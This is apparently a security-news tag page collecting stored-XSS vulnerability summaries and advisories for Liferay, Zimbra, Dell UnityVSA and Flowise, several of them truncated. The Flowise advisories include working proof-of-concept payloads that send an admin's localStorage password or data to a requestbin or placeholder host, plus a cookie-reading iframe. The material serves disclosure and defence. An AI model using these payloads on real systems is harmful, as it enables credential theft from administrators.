Tag
#xss
Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.4.3.15 through 7.4.3.111, and Liferay DXP 2023.Q4.0 through 2023.Q4.5, 2023.Q3.1 through 2023.Q3.8, and 7.4 update 15 through update 92 allow remote attackers to inject arbitrary web script or HTML via crafted payload injected into a Terms and Condition's Name text field to (1) Payment Terms, or (2) the Delivery Term on the view order page.
Cross-site scripting (XSS) vulnerability in the Commerce Search Result widget in Liferay Portal 7.4.0 through 7.4.3.111, and Liferay DXP 2023.Q4 before patch 6, 2023.Q3 before patch 9, and 7.4 GA through update 92 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a Commerce Product's Name text field.
The cyber world never hits pause, and staying alert matters more than ever. Every week brings new tricks, smarter attacks, and fresh lessons from the field. This recap cuts through the noise to share what really matters—key trends, warning signs, and stories shaping today’s security landscape. Whether you’re defending systems or just keeping up, these highlights help you spot what’s coming
WatchTowr finds a serious flaw in Dell UnityVSA (CVE-2025-36604) letting attackers run commands without login. Dell issues patch 5.5.1 - update now.
A now patched security vulnerability in Zimbra Collaboration was exploited as a zero-day earlier this year in cyber attacks targeting the Brazilian military. Tracked as CVE-2025-27915 (CVSS score: 5.4), the vulnerability is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client that arises as a result of insufficient sanitization of HTML content in ICS calendar files,
### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-964p-j4gg-mhwc. This link is maintained to preserve external references. ### Original Description Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log.
### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-7r4h-vmj9-wg42. This link is maintained to preserve external references. ### Original Description Flowise before 3.0.5 allows XSS via a FORM element and an INPUT element when an admin views the chat log.
### Description In the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information with stored Cross Site Scripting. ### PoC ```html <form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:alert('XSS!!!');" /> </form> ``` If the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot. ```html <form> <input type="image" src="/assets/account-3i3qpYzs.png" width="800" height="400" formaction="javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));" /> </form> ``` So when an admin clicks the img that generated by above htm...
### Summary A stored Cross-Site Scripting (XSS) vulnerability in FlowiseAI allows a user to inject arbitrary JavaScript code via message input. When an administrator views messages using the "View Messages" button in the workflow UI, the malicious script executes in the context of the admin’s browser, enabling credential theft via access to `localStorage`. --- ### Details The vulnerability stems from a lack of input sanitization when displaying stored user messages in the admin interface. A specially crafted payload using `<iframe srcdoc="...">` can include arbitrary JavaScript, which is executed when the message is rendered. --- ### PoC 1. Deploy a FlowiseAI agent and make it accessible via browser (e.g., embed on a website). 2. Send the following payload via the agent's chat interface: ```html <iframe srcdoc="<script>fetch('http://requestbin.whapi.cloud/XXXXX?d='+encodeURIComponent(JSON.stringify(localStorage)))</script>"> ``` 3. As an admin, go to the workflow and click...
### Summary A XSS(cross-site scripting) vulnerability is caused by insufficient filtering of input by web applications. Attackers can leverage this XSS vulnerability to inject malicious script code (HTML code or client-side Javascript code) into web pages, and when users browse these web pages, the malicious code will be executed, and the victims may be vulnerable to various attacks such as cookie data theft, etc. ### Details 1. Send a Message `<iframe src="javascript:alert(document.cookie);">` from User in a chat box: <img width="1396" alt="image" src="https://github.com/user-attachments/assets/b472e304-9e7a-40d2-8469-675a5f0744e5" /> ##### Trigger in other ways: 2. Create a Agentflow in cloud platform (https://cloud.flowiseai.com/agentflows) 3. Create a Custom function as an example, use the below example code. ``` const fetch = require('node-fetch'); const url = 'https://external.website'; const options = { method: 'GET', headers: { 'Content-Type': 'application/js...